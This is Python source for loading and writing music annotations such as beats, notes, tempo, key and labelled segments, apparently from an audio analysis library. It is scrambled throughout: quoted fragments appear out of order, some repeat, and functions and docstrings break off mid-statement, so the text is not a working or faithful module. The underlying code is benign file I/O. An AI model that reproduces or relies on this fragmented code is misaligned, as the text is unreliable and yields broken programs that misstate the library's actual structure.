# order the tempi according", "f = filename fid = None # yield an open file handle yield", "Notes ----- Comments (lines starting with '#') and additional columns are ignored, i.e.", "if len(tempi) != len(strengths): raise AssertionError('tempi and strengths must have same length') #", "Parameters ---------- filename : str or file handle File (handle) to open. mode:", "close the file if needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load", "one floating point number per line. Parameters ---------- filename : str or file", "['beat_number']. Parameters ---------- filename : str or file handle File to load the", "sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return at most", "the first column is returned. \"\"\" # read in the events, one per", "segments : numpy structured array Structured array with columns 'start', 'end', and 'label',", "---------- filename : str or file handle File (handle) to open. mode: {'r',", "# write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load", "not None: import warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16 and '", "is not None: import warnings warnings.warn('`mirex` argument is deprecated as of version 0.16", "as comment. Returns ------- numpy array Notes. \"\"\" # set default format if", "returned. \"\"\" # try to load the data from file values = np.loadtxt(filename,", "one if strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the", "0): raise AssertionError('strengths must be positive') # no strength is given, assume an", "that will be written at the beginning of the file as comment. \"\"\"", "\"\"\" Write labelled segments to a file. Parameters ---------- segments : numpy structured", "'removed in 0.18. Please sort the returned array ' 'separately.') # Note: use", "== 2: raise ValueError('unknown format for `notes`') # truncate format to the number", "named columns: 'start' contains the start position (e.g. seconds), 'end' the end position,", "the file is opened. Yields ------ Open file (handle). \"\"\" # check if", "from a text file, one floating point number per line. Parameters ---------- filename", "downbeats instead of beats. Returns ------- numpy array Beats. \"\"\" values = np.loadtxt(filename,", "'%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments", "t2 = tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2, 1]) # for", "(e.g. '%.3f'), a sequence of formats (e.g. ['%.3f', '%d']), or a multi-format string", "tempi : numpy array Array with the detected tempi (first column) and their", "# Note: use 'mergesort', because we want a stable sorting algorithm # which", "the 2nd column are downbeats return values[values[:, 1] == 1][:, 0] else: #", "import warnings warnings.warn('`max_len` is deprecated as of version 0.16 and will be '", "second most dominant tempo. strength : float Their relative strength. \"\"\" # make", "as strengths. sort : bool, deprecated Sort the tempi by their strength. norm_strengths", "relative strength. \"\"\" # make the given tempi a 2d array tempi =", "s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start']", "'end' the end position, and 'label' the segment label. \"\"\" if fmt is", "= np.array(events) # reformat fmt to be a single string if needed if", "magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which yields an", "notes from. Returns ------- numpy array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes,", "2: fmt = ['%.3f', '%d'] elif fmt is None: fmt = '%.3f' write_events(beats,", "the tempo from. split_value : float, optional Value to distinguish between tempi and", "for line in f: s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments", "properly strength_sum = np.sum(strengths) # relative strengths are given (one less than tempi)", "some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which yields", "the file as comment. Returns ------- numpy array Notes. \"\"\" # set default", "deprecated as of version 0.16 and ' 'will be removed in 0.18. Please", "the file as comment. mirex : bool, deprecated Report the lower tempo first", "end segments['label'] = label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\"", "because we want # tempi with uniformly distributed strengths to keep their order", "in f: s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start),", "beginning of the file as comment. Returns ------- numpy structured array Labelled segments", "is returned. \"\"\" # read in the events, one per line events =", "be written at the beginning of the file as comment. \"\"\" if fmt", "written at the beginning of the file as comment. Returns ------- key :", "in which the file is opened. Yields ------ Open file (handle). \"\"\" #", "filename, header=None): \"\"\" Write key string to a file. Parameters ---------- key :", "Returns ------- numpy structured array Labelled segments Notes ----- Labelled segments are represented", "fid = None # yield an open file handle yield f # close", "at the beginning of the file as comment. Notes ----- If `beats` contains", "the built-in open() to transparently apply some magic file handling @contextlib.contextmanager def open_file(filename,", "is not None: import warnings warnings.warn('`max_len` is deprecated as of version 0.16 and", "or file handle File to load the notes from. Returns ------- numpy array", "label of segments. \"\"\" start, end, label = [], [], [] with open_file(filename)", "and strengths must have same length if len(tempi) != len(strengths): raise AssertionError('tempi and", "contains both time and number of the beats, they are filtered to contain", "format to the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the", "strongest tempi and strengths elif len(tempi) > 1: t1, t2 = tempi[:2, 0]", "' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write", "and their strengths (second column). filename : str or file handle Output file.", "end, label = [], [], [] with open_file(filename) as f: for line in", "the notes to a file. Parameters ---------- notes : numpy array, shape (num_notes,", "is returned. \"\"\" # try to load the data from file values =", "Parameters ---------- filename : str or file handle File to load the downbeats", "(lines starting with '#') and additional columns are ignored, i.e. only the first", "delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\"", "is None and beats.ndim == 2: fmt = ['%.3f', '%d'] elif fmt is", "delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments from file, one segment per", "will be written at the beginning of the file as comment. mirex :", "load_beats(filename, downbeats=False): \"\"\" Load the beats from the given file, one beat per", "t2, t1, 1. - strength # format as a numpy array and write", "beginning of the file as comment. \"\"\" if fmt is None and beats.ndim", "the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes,", "segments # 'label' needs to be castable to str SEGMENT_DTYPE = [('start', np.float),", "(num_tempi[, 2]) Array with tempi. If no strength is parsed, a 1-dimensional array", "colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter,", "str or file handle File to read key information from. Returns ------- str", "e.g. '%.3f %d %.3f %d', in which case `delimiter` is ignored. delimiter :", "file, one event per line. Parameters ---------- events : numpy array Events to", "trick because we want # tempi with uniformly distributed strengths to keep their", "argument is deprecated as of version 0.16 ' 'and will be removed in", "strs, optional A sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format", "[('start', np.float), ('end', np.float), ('label', object)] # overwrite the built-in open() to transparently", "# rows with a \"1\" in the 2nd column are downbeats return values[values[:,", "= [], [], [] with open_file(filename) as f: for line in f: s,", "must have the following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename", "= t2 = strength = np.nan # only one tempo was detected if", "sequence of strs, optional A sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or", "t2: t1, t2, strength = t2, t1, 1. - strength # format as", "load_downbeats(filename): \"\"\" Load the downbeats from the given file. Parameters ---------- filename :", "their strength. norm_strengths : bool, deprecated Normalize the strengths to sum 1. max_len", "except AttributeError: string = e except TypeError: string = fmt % e f.write(bytes((string", "to a file. Parameters ---------- segments : numpy structured array Labelled segments, one", "t2, strength = t2, t1, 1. - strength # format as a numpy", "the notes from the given file, one note per line of format 'onset_time'", "np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if norm_strengths is not None: import", "if fmt is None and beats.ndim == 2: fmt = ['%.3f', '%d'] elif", "write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant tempi and the", "the filename according to their filename into tempi and strengths # TODO: this", "deprecated Normalize the strengths to sum 1. max_len : int, deprecated Return at", "strs, optional A single format (e.g. '%.3f'), a sequence of formats (e.g. ['%.3f',", "str, optional String or character separating columns. header : str, optional String that", "None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\"", "strengths = strengths[sort_idx] # return at most 'max_len' tempi and their relative strength", "beats : numpy array Beats or downbeats to be written to file. filename", "be positive') # no strength is given, assume an evenly distributed one if", "------- str Key. \"\"\" with open_file(filename) as f: return f.read().strip() def write_key(key, filename,", "yields an open file or handle with the given mode and closes it", "it if needed afterwards. Parameters ---------- filename : str or file handle File", "The most dominant tempo. tempo_2 : float The second most dominant tempo. strength", "write the events to. fmt : str or sequence of strs, optional A", "string_types ENCODING = 'utf8' # dtype for numpy structured arrays that contain labelled", "------- tempo_1 : float The most dominant tempo. tempo_2 : float The second", "to be castable to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)]", "max_len : int, deprecated Return at most `max_len` tempi. Returns ------- tempi :", "and will be ' 'removed in 0.18. Please sort the returned array '", "<= split_value] # make the strengths behave properly strength_sum = np.sum(strengths) # relative", "version 0.16 and will be ' 'removed in 0.18. Please sort the returned", "or file handle Output file. header : str, optional String that will be", "fmt = ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim == 2: raise ValueError('unknown", "numbers, and <label> is a string. Parameters ---------- filename : str or file", "MIREX, the lower tempo must be given first if mirex is not None:", "is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\"", "strengths to sum 1. max_len : int, deprecated Return at most `max_len` tempi.", "optional A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format", "File to load the events from. Returns ------- numpy array Events. Notes -----", "optional A single format (e.g. '%.3f'), a sequence of formats (e.g. ['%.3f', '%d']),", "a string. Parameters ---------- filename : str or file handle File to read", "array Array with the detected tempi (first column) and their strengths (second column).", "comment. Returns ------- numpy structured array Labelled segments Notes ----- Labelled segments are", "as a numpy array and write to output out = np.array([t1, t2, strength],", "'end', and 'label', containing the beginning, end, and label of segments. \"\"\" start,", "'%s']), or a multi-format string (e.g. '%.3f %.3f %s'), in which case `delimiter`", "import numpy as np from .audio import load_audio_file from .midi import load_midi, write_midi", "' 'tempi manually') if t1 > t2: t1, t2, strength = t2, t1,", "0] else: # 1st column is the beat time, the rest is ignored", "positive') # no strength is given, assume an evenly distributed one if strength_sum", ": str or file handle File to load the tempo from. split_value :", "strength. \"\"\" # make the given tempi a 2d array tempi = np.array(tempi,", "the file as comment. \"\"\" if fmt is None and beats.ndim == 2:", "optional String or character separating columns. header : str, optional String that will", "array Labelled segments, one per row (column definition see SEGMENT_DTYPE). filename : str", "int, deprecated Return at most `max_len` tempi. Returns ------- tempi : numpy array,", "open file handle yield f # close the file if needed if fid:", "be written at the beginning of the file as comment. Notes ----- If", "of the file as comment. mirex : bool, deprecated Report the lower tempo", "optional Load only downbeats instead of beats. Returns ------- numpy array Beats. \"\"\"", "of the file as comment. \"\"\" events = np.array(events) # reformat fmt to", "at the beginning of the file as comment. Returns ------- key : str", "from. downbeats : bool, optional Load only downbeats instead of beats. Returns -------", "beats. Returns ------- numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim", "needed if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write output with open_file(filename,", "relative strength if max_len is not None: import warnings warnings.warn('`max_len` is deprecated as", "file, one note per line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ----------", "e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] =", "events, one per line events = np.loadtxt(filename, ndmin=2) # 1st column is the", "\"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the", "to a file. Parameters ---------- notes : numpy array, shape (num_notes, 2) Notes,", "tempi = values[values > split_value] strengths = values[values <= split_value] # make the", "per line of format 'beat_time' ['beat_number']. Parameters ---------- filename : str or file", "formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format string (e.g. '%.3f %.3f %s'),", "np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant", "if isinstance(filename, string_types): f = fid = _io.open(filename, mode) else: f = filename", "as comment. \"\"\" events = np.array(events) # reformat fmt to be a single", "<start> <end> <label>, where <start> and <end> are floating point numbers, and <label>", "= np.nan # only one tempo was detected if len(tempi) == 1: t1", "string = fmt % tuple(e.tolist()) except AttributeError: string = e except TypeError: string", "a text file, one floating point number per line. Parameters ---------- filename :", "to sum 1. max_len : int, deprecated Return at most `max_len` tempi. Returns", "+ header + '\\n').encode(ENCODING))) # write events for e in events: try: string", "keys in case of duplicate keys # but we need to apply this", "with '#') and additional columns are ignored, i.e. only the first column is", "'note_number' ['duration' ['velocity']]. filename : str or file handle File to write the", "with open_file(filename) as f: return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key", "filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant tempi and the relative", "file handle File to read the labelled segments from. Returns ------- segments :", "/= float(strength_sum) # tempi and strengths must have same length if len(tempi) !=", "str or file handle Output file. header : str, optional String that will", "version 0.16 and ' 'will be removed in 0.18. Please normalize strengths '", "array with tempi (first column) and their relative strengths (second column) is returned.", "Comments (lines starting with '#') and additional columns are ignored, i.e. only the", "the file as comment. Returns ------- numpy structured array Labelled segments Notes -----", "downbeats=False): \"\"\" Load the beats from the given file, one beat per line", "of the file as comment. \"\"\" if fmt is None and beats.ndim ==", "this '(-strengths)' trick because we want # tempi with uniformly distributed strengths to", "0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to a", "header=None): \"\"\" Write labelled segments to a file. Parameters ---------- segments : numpy", "fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments from file, one segment", "`values` > `split_value` are interpreted as tempi [bpm], `values` <= `split_value` are interpreted", "both time and number of the beats, they are filtered to contain only", "The second most dominant tempo. strength : float Their relative strength. \"\"\" #", "a file. Parameters ---------- tempi : numpy array Array with the detected tempi", "line. Each segment is of form <start> <end> <label>, where <start> and <end>", "by MIREX). Returns ------- tempo_1 : float The most dominant tempo. tempo_2 :", "where <start> and <end> are floating point numbers, and <label> is a string.", "most dominant tempo. tempo_2 : float The second most dominant tempo. strength :", "strengths behave properly strength_sum = np.sum(strengths) # relative strengths are given (one less", "write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to a file. Parameters", "Parameters ---------- key : str Key name. filename : str or file handle", "load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to", "we need to apply this '(-strengths)' trick because we want # tempi with", "optional A single format (e.g. '%.3f'), a sequence of formats, or a multi-format", "delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats from the given file. Parameters", "len(tempi) != len(strengths): raise AssertionError('tempi and strengths must have same length') # order", "deprecated Report the lower tempo first (as required by MIREX). Returns ------- tempo_1", "keeps the order of the keys in case of duplicate keys # but", "filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to a file. Parameters ----------", "a multi-format string (e.g. '%.3f %d'), in which case `delimiter` is ignored. delimiter", "['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords =", "open_file(filename) as f: return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key string", "package. \"\"\" from __future__ import absolute_import, division, print_function import io as _io import", "values.ndim > 1: if downbeats: # rows with a \"1\" in the 2nd", "multi-format string, e.g. '%.3f %d %.3f %d', in which case `delimiter` is ignored.", "column is returned. \"\"\" # read in the events, one per line events", "strength if max_len is not None: import warnings warnings.warn('`max_len` is deprecated as of", "str or file handle Output file. delimiter : str, optional String or character", "Returns ------- key : str Key name. \"\"\" write_events([key], filename, fmt='%s', header=header) def", "yield f # close the file if needed if fid: fid.close() @suppress_warnings def", "string = e except TypeError: string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING)))", "the lower tempo must be given first if mirex is not None: import", "will be removed in version 0.17. Please sort the ' 'tempi manually') if", "notes to. fmt : str or sequence of strs, optional A sequence of", "\"1\" in the 2nd column are downbeats return values[values[:, 1] == 1][:, 0]", "downbeats to be written to file. filename : str or file handle File", "# make the strengths behave properly strength_sum = np.sum(strengths) # relative strengths are", "make the given tempi a 2d array tempi = np.array(tempi, ndmin=2) # default", "write_key(key, filename, header=None): \"\"\" Write key string to a file. Parameters ---------- key", "filename : str or file handle File to load the beats from. downbeats", "label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label'] =", "# overwrite the built-in open() to transparently apply some magic file handling @contextlib.contextmanager", "if mirex is not None: import warnings warnings.warn('`mirex` argument is deprecated as of", "if header is not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write", "segment per line. Each segment is of form <start> <end> <label>, where <start>", "2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename : str or file", "File to load the downbeats from. Returns ------- numpy array Downbeats. \"\"\" return", "line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] =", "and 'label', containing the beginning, end, and label of segments. \"\"\" start, end,", "------- numpy structured array Labelled segments Notes ----- Labelled segments are represented as", "Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write", "__future__ import absolute_import, division, print_function import io as _io import contextlib import numpy", "load the notes from. Returns ------- numpy array Notes. \"\"\" return np.loadtxt(filename, ndmin=2)", "rest is ignored return values[:, 0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t',", "at the beginning of the file as comment. \"\"\" events = np.array(events) #", "a stable sorting algorithm # which keeps the order of the keys in", "for numpy structured arrays that contain labelled segments # 'label' needs to be", ": str or file handle File to write the events to. fmt :", "file handle File to load the events from. Returns ------- numpy array Events.", "downbeats from. Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats,", "the rest is ignored return values[:, 0] return values def write_beats(beats, filename, fmt=None,", "we need to open the file if isinstance(filename, string_types): f = fid =", "as comment. Notes ----- If `beats` contains both time and number of the", "is ignored return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write", "the given file, one beat per line of format 'beat_time' ['beat_number']. Parameters ----------", "to a file. Parameters ---------- beats : numpy array Beats or downbeats to", "SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)] # overwrite the built-in open()", "file. Parameters ---------- filename : str or file handle File to load the", "no strength is given, assume an evenly distributed one if strength_sum == 0:", "will be written at the beginning of the file as comment. Returns -------", "= '%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats", "filename : str or file handle File to load the tempo from. split_value", "from. Returns ------- numpy array Events. Notes ----- Comments (lines starting with '#')", "fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events from a text file,", "load_chords = load_segments write_chords = write_segments def load_key(filename): \"\"\" Load the key from", "filename : str or file handle File to read key information from. Returns", "fmt is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header)", "`beats` contains both time and number of the beats, they are filtered to", "file. Parameters ---------- filename : str or file handle File to read key", "and number of the beats, they are filtered to contain only the downbeats", "the strengths to sum 1. max_len : int, deprecated Return at most `max_len`", "check if we need to open the file if isinstance(filename, string_types): f =", "= write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats from the given", "file. Parameters ---------- key : str Key name. filename : str or file", "strength = tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX, the lower tempo", "contain only the downbeats (i.e. only the times of those beats with a", "file if needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events", "with columns 'start', 'end', and 'label', containing the beginning, end, and label of", "start, end, label = [], [], [] with open_file(filename) as f: for line", "handle File to load the beats from. downbeats : bool, optional Load only", "or sequence of strs, optional A sequence of formats (e.g. ['%.3f', '%.3f', '%s']),", "('label', object)] # overwrite the built-in open() to transparently apply some magic file", "= load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats", "load_segments write_chords = write_segments def load_key(filename): \"\"\" Load the key from the given", "norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16", "return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to", "to load the tempo from. split_value : float, optional Value to distinguish between", "segment label. \"\"\" if fmt is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments,", "Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None,", "numpy array, shape (num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename", "tempi a 2d array tempi = np.array(tempi, ndmin=2) # default values t1 =", "is returned. If strengths are given, a 2D array with tempi (first column)", "\"\"\" Load the notes from the given file, one note per line of", "labelled segments from file, one segment per line. Each segment is of form", "format for `notes`') # truncate format to the number of colums given fmt", ": numpy structured array Labelled segments, one per row (column definition see SEGMENT_DTYPE).", "the start position (e.g. seconds), 'end' the end position, and 'label' the segment", "afterwards. Parameters ---------- filename : str or file handle File (handle) to open.", "as of version 0.16 ' 'and will be removed in version 0.17. Please", "file as comment. Returns ------- key : str Key name. \"\"\" write_events([key], filename,", "# only one tempo was detected if len(tempi) == 1: t1 = tempi[0][0]", "None # yield an open file handle yield f # close the file", ": float The second most dominant tempo. strength : float Their relative strength.", "ignored return values[:, 0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\"", "handle Output filename or handle. fmt : str or sequence of strs, optional", "in case of duplicate keys # but we need to apply this '(-strengths)'", "np.float), ('label', object)] # overwrite the built-in open() to transparently apply some magic", "the events, one per line events = np.loadtxt(filename, ndmin=2) # 1st column is", "segments['start'] = start segments['end'] = end segments['label'] = label return segments def write_segments(segments,", "if we need to open the file if isinstance(filename, string_types): f = fid", "values = np.loadtxt(filename, ndmin=1) # split the filename according to their filename into", "warnings warnings.warn('`mirex` argument is deprecated as of version 0.16 ' 'and will be", "labelled segments to a file. Parameters ---------- segments : numpy structured array Labelled", "ENCODING = 'utf8' # dtype for numpy structured arrays that contain labelled segments", "strs, optional A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a", "['%.3f', '%.3f', '%s']), or a multi-format string (e.g. '%.3f %.3f %s'), in which", "start segments['end'] = end segments['label'] = label return segments def write_segments(segments, filename, fmt=None,", "\"\"\" # read in the events, one per line events = np.loadtxt(filename, ndmin=2)", "filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats from the given", "(e.g. seconds), 'end' the end position, and 'label' the segment label. \"\"\" if", "array Notes. \"\"\" # set default format if fmt is None: fmt =", "0.17. Please sort the ' 'tempi manually') if t1 > t2: t1, t2,", "a multi-format string (e.g. '%.3f %.3f'), in which case `delimiter` is ignored. delimiter", "\"\"\" with open_file(filename) as f: return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write", "isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write output with open_file(filename, 'wb') as", "event per line. Parameters ---------- events : numpy array Events to be written", "of segments. \"\"\" start, end, label = [], [], [] with open_file(filename) as", "information must have the following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ----------", "%.3f %d', in which case `delimiter` is ignored. delimiter : str, optional String", "per row (column definition see SEGMENT_DTYPE). filename : str or file handle Output", "'start', 'end', and 'label', containing the beginning, end, and label of segments. \"\"\"", "header=None): \"\"\" Write the beats to a file. Parameters ---------- beats : numpy", "fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def", "is ignored. delimiter : str, optional String or character separating columns. header :", "`split_value` are interpreted as strengths. sort : bool, deprecated Sort the tempi by", "an open file handle yield f # close the file if needed if", "float The second most dominant tempo. strength : float Their relative strength. \"\"\"", "fmt to be a single string if needed if isinstance(fmt, (list, tuple)): fmt", "returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None):", "open_file(filename, mode='r'): \"\"\" Context manager which yields an open file or handle with", "mirex=None): \"\"\" Write the most dominant tempi and the relative strength to a", "deprecated Sort the tempi by their strength. norm_strengths : bool, deprecated Normalize the", "formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format string, e.g. '%.3f %d", "tempo information from the given file. Tempo information must have the following format:", "# write output with open_file(filename, 'wb') as f: # write header if header", "written at the beginning of the file as comment. Returns ------- numpy array", "from file values = np.loadtxt(filename, ndmin=1) # split the filename according to their", "tempi [bpm], `values` <= `split_value` are interpreted as strengths. sort : bool, deprecated", "(e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format string, e.g. '%.3f %d %.3f", "or character separating columns. header : str, optional String that will be written", "two strongest tempi and strengths elif len(tempi) > 1: t1, t2 = tempi[:2,", "written at the beginning of the file as comment. \"\"\" events = np.array(events)", "(e.g. '%.3f'), a sequence of formats, or a multi-format string (e.g. '%.3f %.3f'),", "time, the rest is ignored return values[:, 0] return values def write_beats(beats, filename,", "'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename : str or file handle", "e except TypeError: string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets", "Parameters ---------- filename : str or file handle File to load the tempo", "0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats", "to the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes", "<end> <label>, where <start> and <end> are floating point numbers, and <label> is", "the events from. Returns ------- numpy array Events. Notes ----- Comments (lines starting", "array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats:", "detected tempi (first column) and their strengths (second column). filename : str or", "strengths # TODO: this is kind of hack-ish, find a better solution tempi", "(one less than tempi) if len(tempi) - len(strengths) == 1: strengths = np.append(strengths,", "a file, one event per line. Parameters ---------- events : numpy array Events", "array Structured array with columns 'start', 'end', and 'label', containing the beginning, end,", "write_chords = write_segments def load_key(filename): \"\"\" Load the key from the given file.", "strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if norm_strengths is not", "String that will be written at the beginning of the file as comment.", "'\\n').encode(ENCODING))) # write events for e in events: try: string = fmt %", "values[values[:, 1] == 1][:, 0] else: # 1st column is the beat time,", "numpy array Notes. \"\"\" # set default format if fmt is None: fmt", "the notes from. Returns ------- numpy array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def", "open the file if isinstance(filename, string_types): f = fid = _io.open(filename, mode) else:", "'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or file handle File to load", "filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information", "1: t1 = tempi[0][0] strength = 1. # consider only the two strongest", "version 0.17. Please sort the ' 'tempi manually') if t1 > t2: t1,", "norm_strengths=None, max_len=None): \"\"\" Load tempo information from the given file. Tempo information must", "given file. Parameters ---------- filename : str or file handle File to load", "tempo from. split_value : float, optional Value to distinguish between tempi and strengths.", "the returned array ' 'separately.') # Note: use 'mergesort', because we want a", "numpy as np from .audio import load_audio_file from .midi import load_midi, write_midi from", "an evenly distributed one if strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi))", "np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to", "return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events", "of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or file handle", "a 2d array tempi = np.array(tempi, ndmin=2) # default values t1 = t2", "are interpreted as tempi [bpm], `values` <= `split_value` are interpreted as strengths. sort", "---------- filename : str or file handle File to load the downbeats from.", "segments['label'] = label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write", "tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename : str or file handle File", "is None: fmt = ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim == 2:", "as _io import contextlib import numpy as np from .audio import load_audio_file from", "if downbeats: # rows with a \"1\" in the 2nd column are downbeats", "Parameters ---------- beats : numpy array Beats or downbeats to be written to", "Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats: #", "relative strengths (second column) is returned. \"\"\" # try to load the data", "Sort the tempi by their strength. norm_strengths : bool, deprecated Normalize the strengths", "Normalize the strengths to sum 1. max_len : int, deprecated Return at most", "at the beginning of the file as comment. mirex : bool, deprecated Report", "beat number of 1). \"\"\" if beats.ndim == 2: beats = beats[beats[:, 1]", "from file, one segment per line. Each segment is of form <start> <end>", "= np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if norm_strengths is not None:", "most dominant tempo. strength : float Their relative strength. \"\"\" # make the", "per line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or", "---------- notes : numpy array, shape (num_notes, 2) Notes, row format 'onset_time' 'note_number'", "['duration' ['velocity']]. filename : str or file handle File to write the notes", "from ..utils import suppress_warnings, string_types ENCODING = 'utf8' # dtype for numpy structured", "sequence of strs, optional A single format (e.g. '%.3f'), a sequence of formats,", "else: f = filename fid = None # yield an open file handle", "to be written to file. filename : str or file handle File to", "bool, deprecated Report the lower tempo first (as required by MIREX). Returns -------", "tempi and their relative strength if max_len is not None: import warnings warnings.warn('`max_len`", "# write events for e in events: try: string = fmt % tuple(e.tolist())", "tempi) if len(tempi) - len(strengths) == 1: strengths = 